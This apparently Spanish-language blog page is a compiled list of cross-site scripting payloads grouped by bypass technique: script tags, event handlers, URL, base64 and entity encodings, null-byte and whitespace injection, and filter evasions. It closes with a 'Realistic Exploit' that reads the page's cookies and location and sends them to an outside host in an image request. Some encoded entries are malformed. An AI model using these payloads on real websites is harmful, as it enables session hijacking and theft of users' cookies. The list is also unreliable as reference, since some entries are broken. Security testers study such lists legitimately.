Cross Site Scripting | Recopilacion de Payloads

Recopilacion de Paylodas

xss vulnerabilidad cross site scripting payloads


Payloads para explotar la vulnerabilidad XSS (Cross Site Scripting)

Básico
##<script>alert(1234)</script>##1
##<script>prompt(1234)</script>##1
##<ScripT>alert(1234)</ScRipT>##1
##/<script>alert(1234)</script>##0
##<script>var m=<html><a href="//host">link</a>##1

Payload sin el TAG <script>
##<img+src="http://localhost">##1
##<DIV+STYLE="background-image: url(javascript:alert(1))">##1
##<IMG+DYNSRC="javascript:alert(1);">##1
##<IMG+LOWSRC="javascript:alert(1);">##1
##<isindex+type=image+src=1+onerror=alert(1)>##1
##<meta style="xss:expression(open(alert(1)))" />##1
##<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert(1);\">##1
##<!</textarea <body onload='alert(1)'>##1
##<img+<iframe ="1" onerror="alert(1)">##1
##<iframe src="http://localhost"></iframe>##1
##<base+href="javascript:alert(1);//">##1
##<bgsound+src="javascript:alert(1);">##1
##<INPUT+TYPE="IMAGE"+SRC="javascript:alert(1);">##1
##<object+data="javascript:alert(0)">##1
##<STYLE>li+{list-style-image:url("javascript:alert(1)");}</STYLE><UL><LI>1##1
##<Layer+src="http://localhost">##1
##%3E%3Cbody%20onload=javascript:alert(1)%3E##1
##'">><marquee><h1>1</h1></marquee>##1
##</br style=a:expression(alert(1))>##1
##<font style='color:expression(alert(1))'>##1
##<embed src="data:image/svg+xml;>##1
##<frameset><frame src="xss"></frameset>##1
##<link href="http://host/xss.css">##1
##="/>%3ciframe%20src%3djavascript%3aalert%283%29%3e##1
##<object><param name="src" value="javascript:alert(0)"></param></object>##1
##<isindex action=javascript:alert(1) type=image>##1
##<b/alt="1"onmouseover=InputBox+1 language=vbs>test</b>##1
##</a onmousemove="alert(1)">##1
##'%26%26'javascript:alert%25281%2529//##1

Without Brackets
##"+onmouseover="window.location='http://localhost'##1
##"+onkeypress="prompt(23)"+##1
##"+onfocus="prompt(1)"+##1
##500);alert(1);//##1
##alert(document['cookie'])##1
##with(document)alert(cookie)##1
##";location=location.hash)//#0={};alert(0)##1
##//";alert(String.fromCharCode(88,83,83))##1
##%F6%3Cimg+onmouseover=prompt(/test/)//%F6%3E##1
##"+onDblClick=prompt(123)"+##1
##"+onError=prompt(123)"+##1
##"+onReset=prompt(123)"+##1
Payloand XSS en JavaScript
##javascript:propmpt(1)##1
##javascript:eval(unescape(location.href))##1
##a="get";b="URL";c="javascript:";d="alert(1);";eval(a+b+c+d);##1
##location=location.hash.slice(1);##1
##";location=location.hash)//#0={};alert(0)##1
##location=location.hash##1
##""+{toString:alert}##1
##""+{valueOf:alert}##1
##";eval(unescape(location))//# %0Aalert(0)##1
##;location.href='http://site';//##1

XSS - With NewLine
##%";eval(unescape(location))//#%0Aprompt(0)##1
##<SCRIPT>a=/XSS/%0Aalert(a.source)</SCRIPT>##1
##%'});%0aalert(1);%20//##1

XSS - With NewLine and Comment
##<script>//>%0Aalert(1);</script>##1

XSS - Null Byte Injected
##<script%00>alert(1)</script%00>##1
##<scr%00ipt>prompt(1)</sc%00ript>##1
##<scr\0ipt>prompt(1)</sc\0ript>##1
##%00"><script>alert(1)</script>##1

XSS - Null Byte in Script Tags
##%3Cscript%3Ealert(1)%3C/script%00TESTTEST%3E##1
 
XSS - With Encoded NewLine
##<IMG+SRC="jav&#x0A;ascript:alert(1);">##1
  

XSS - With Carriage Return
##<IMG+SRC="jav%0dascript:alert(1);">##1
  

With Encoded Carriage Return
##<IMG+SRC="jav#x0D;ascript:alert(1);">##1 

Con Tab
##<IMG+SRC="jav%09ascript:alert(1);">##1 

with Encoded Tab
##<IMG+SRC="jav&#x09;ascript:alert(1);">##1 

Concatenacion
##document.write("<scr"+"ipt language=javascript src=http://localhost/></scr"+"ipt>");##1

Desarrollador BlackList
##<scr<script>ipt>prompt(document.cookie)</scr</script>ipt>##1
  

XSS - basic XSS as parameter name
##12&<script>alert(123)</script>=123##1 

XSS - with eval
##<img src=x:alert(alt) onerror=eval(src) alt=0>##1 

XSS - Jquery
##<img src=/ onerror=alert(1)>##1 

XSS - with eval
##a="get";b="URL(\"";c="javascript:";d="alert('XSS');\")";eval(a+b+c+d);##1
  

XSS - No white space for IE
##<img/src="xss.png"alt="xss">##1
  

XSS - Mocha
##<IMG SRC="mocha:[code]">##1 

XSS - XHTML
##<x:scriptxmlns:x="http://www.w3.org/1999/xhtml">alert(1);</x:script>##1

XSS - Remote style sheet
##<STYLE>@import'http://host/css';</STYLE>##1 

XSS - Special XSS
##<SCRIPT+a=">'>"SRC="http://localhost"></SCRIPT>##1 

XSS - Bypass for Custom Filters
##<scr<script>ipt>alert('XSS')</scr</script>ipt>##1
  

XSS - URL Encoded
##%3Cscript%3Ealert(1)%3C/script%3E##1 

XSS - Null Byte Injected
##foo%00<script>alert(document.cookie)</script>##1
  

XSS - Developer filter bypass
##"><<script>alert(document.cookie);//<</script>##1
  

XSS - Concatination
##><s"%2b"cript>alert(document.cookie)</s"%2B"cript>##1
  

XSS - Extra URL Encoded
##3Cscript%3Ealert(1)%3C%2Fscript%3E##1 

XSS - Double URL EncodedS
##%253Cscript%253Ealert(1)%253C/script%253E##1 

XSS - Full URL Encoded
##%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3e##1
  

XSS - Ascii Encoded
##%BCscript%BEalert(%A21%A2)%BC/script%BE##1
  

XSS - Overlong UTF
##%C0%BCscript%C0%BEalert(1)%C0%BC/script%C0%BE##1
  

XSS - Base64 Encoded
##<object+data="data:text/html base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>##1

XSS - Base64 Encoded
##<a
  HREF="data:text/html;base64,PHNjcmlwdD5hbGVydCgwKTwvc2NyaXB0Pg==">ugh</a>##1
  

XSS - Full Base64 Encoded
##PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==##1
  

XSS - HTML Encoded
##<a+href="javas&#99;ript&#35;alert(1);">##1 

XSS - UTF-8 Encoded
##<IMG+SRC=j&#X41vascript:alert(1)>##1 

XSS - UTF-8 Encoded
##<IMG+SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#39;&#41;>##1

XSS - With uncommon event handler
##<INPUT+TYPE="checkbox"+onDblClick=confirm(XSS)>##1 

XSS - With uncommon event handler
##<APPLET+CODE=""+CODEBASE="http://url/xss">##1
 
XSS - Overlong UTF
##%C0%BCscript%C0%BEalert(1)%C0%BC/script%C0%BE##1 

XSS - Long UTF-8 Encoded
##<IMG+SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000039&#0000041>##1
  

XSS - %U Encoded
##%u0022%u003e%u003cscript%u003ealert%u0028%u0027Hello%u0027%u0029%u003c%u002fscript%u003e##1

XSS - UTF-7 Encoded
##+ADw-SCRIPT+AD4-alert(1);+ADw-/SCRIPT+AD4-##1

XSS - Without quotes
##<SCRIPT>alert(String.fromCharCode(88))</SCRIPT>##1

XSS - HTML Entity Encoding
##&lt;script&gt;prompt(&apos;1&apos;)&lt;/script&gt;##1
  

XSS - Hex Entity Encoding
##&#x3c;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3e;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x27;&#x78;&#x73;&#x73;&#x27;&#x29;&#x3c;&#x2f;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3e;##1
  

XSS - Decimal Entity Encoding
##&#x60;&#x115;&#x99;&#x114;&#x105;&#x112;&#x116;&#x62;&#x97;&#x108;&#x101;&#x114;&#x116;&#x40;&#x39;&#x120;&#x115;&#x115;&#x39;&#x41;&#x60;&#x47;&#x115;&#x99;&#x114;&#x105;&#x112;&#x116;&#x62;##1
  

XSS - Octal Entity Encoding
##&#x74;&#x163;&#x143;&#x162;&#x151;&#x160;&#x164;&#x76;&#x141;&#x154;&#x145;&#x162;&#x164;&#x50;&#x47;&#x170;&#x163;&#x163;&#x47;&#x51;&#x74;&#x57;&#x163;&#x143;&#x162;&#x151;&#x160;&#x164;&#x76;##1
  

XSS - Url Encoded HTML Entity
##=<img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert%26%23x28;1%26%23x29;>##1

XSS - With Expression for IE
##"+style%3d"x%3aexpression(alert(1))+##1
  

XSS - Escaping escapes
##\";alert(1);//##1 

XSS - Eating Chars
##<img src="x:%90" title="onerror=alert(1)//">##1 

XSS - FormFeed Injected for IE
##%3Cscript%0Caaaaa%3Ealert%2812%29%3C/script%0Caaaaa%3E##1 

XSS - FormFeed Injected for Firefox
##<script%0Caaaaa>alert(123)</script>##1

XSS - Vertical-tab Injected for IE
##%3Cscript%0Baaa%3Ealert%28%29%3C/script%0Baaaa%3E##1

XSS - Vertical-tab Injected for Firefox
##%3Cscript%0Baaa%3Ealert%281%29%3C/script%3E##1 

XSS - With star
##<*script>prompt(123)<*/script>##1 

XSS - Carriage Return Injected
##<script%0Daaa>alert(1)</script%0Daaaa>##1 

XSS - Space Insertion
##<script%20TEST>alert(1)</script%20TESTTEST>##1

XSS - Non Alpha/Non Digit
##<SCRIPT/XSSSRC="http://host"></SCRIPT>##1 

XSS - No Closing Script Tag
##<SCRIPT+SRC=http://host/##1 

XSS - With Extra Brackets
##<<SCRIPT>alert(1);//<</SCRIPT>##1 

XSS - Half-Width/Full-Width Characters
##<script>prompt(1)</script>##1

Half-Width/Full-Width Unicode -1
##\uff1c\uff53\uff43\uff52\uff49\uff50\uff54\uff1e\uff41\uff4c\uff45\uff52\uff54\uff08\uff07\uff58\uff53\uff53\uff07\uff09\uff1c\uff0f\uff53\uff43\uff52\uff49\uff50\uff54\uff1e##1

Half-Width/Full-Width Unicode -2
##%uff1c%uff53%uff43%uff52%uff49%uff50%uff54%uff1e%uff41%uff4c%uff45%uff52%uff54%uff08%uff07%uff58%uff53%uff53%uff07%uff09%uff1c%uff0f%uff53%uff43%uff52%uff49%uff50%uff54%uff1e##1
  

Ful width %u encoding
##%uff1cscript%uff1ealert(1234)%uff1c/script%uff1e##1 

As a parametername
##1&"><script>alert(1)</script>=1##1 

Custom Filter
##</scr</script>ipt><ifr<iframeame/onload=prompt()>whs##1

Realistic Exploit
##%3E%3Cbody%20onload=javascript:alert(1)# var sc=escape(document.cookie);var d=escape(document.location);var mI=new Image();mI.src="http://host?a="+d+"&b="+ sc;##1

Publicar un comentario

0 Comentarios

Slider Parnert

Subscribe Text

¿Quieres estar al día con noticias?